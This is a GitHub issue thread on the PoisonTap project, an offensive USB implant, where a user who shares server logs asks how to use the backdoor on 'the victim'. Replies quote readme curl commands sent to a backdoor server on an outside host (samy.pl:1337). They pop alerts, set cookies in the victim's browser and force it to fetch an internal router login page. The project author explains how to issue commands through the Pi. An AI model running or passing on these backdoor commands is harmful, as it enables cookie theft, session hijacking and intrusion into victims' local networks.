samyk/poisontap #116: need help :) beckend Server get PoisonTap requested. but no cookies.log

neddhelp, 2017-05-27:
Sat May 27 2017 01:59:30 GMT+0200 (CEST) HTTP server. URL / requested.
Sat May 27 2017 02:03:38 GMT+0200 (CEST) HTTP server. URL / requested.
Sat May 27 2017 02:03:39 GMT+0200 (CEST) HTTP server. URL / requested.
message: {"req":"hi"}
{ req: 'hi' }
Sat May 27 2017 02:04:33 GMT+0200 (CEST) HTTP server. URL / requested.
connection closed
Sat May 27 2017 02:06:04 GMT+0200 (CEST) HTTP server. URL /PoisonTap requested.
Sat May 27 2017 02:06:04 GMT+0200 (CEST) HTTP server. URL / requested.
Sat May 27 2017 02:06:05 GMT+0200 (CEST) HTTP server. URL / requested.

What do I have to do to make it work?
Are there any commands to return a message to the victim ?
How can I use the backdoor?

KALRONG, 2017-06-02:
From the readme file you have three examples:
# pop alert to victim
curl 'http://samy.pl:1337/exec?alert("muahahahaha")'
# to set a cookie on victim
curl 'http://samy.pl:1337/exec?document.cookie="key=value"'
# to force victim to load a url via ajax (note, jQuery is stored inside the backdoor)
curl 'http://samy.pl:1337/exec?$.get("http://192.168.0.1.ip.samy.pl/login",function(d)\{console.log(d)\})'

Im curious, how did you manage to get the websocket working? in which OS did you test this? Mine is just timing out in both linux and windows :(

samyk, 2017-06-02:
The WebSocket will only open after you remove PoisonTap. There's no need for the WebSocket while it's plugged in as you can issue all your commands through the Pi -- just place them in the backdoor.

KALRONG, 2017-06-02:
Ty Samyk, found that out after a while but forgot to edit this answer.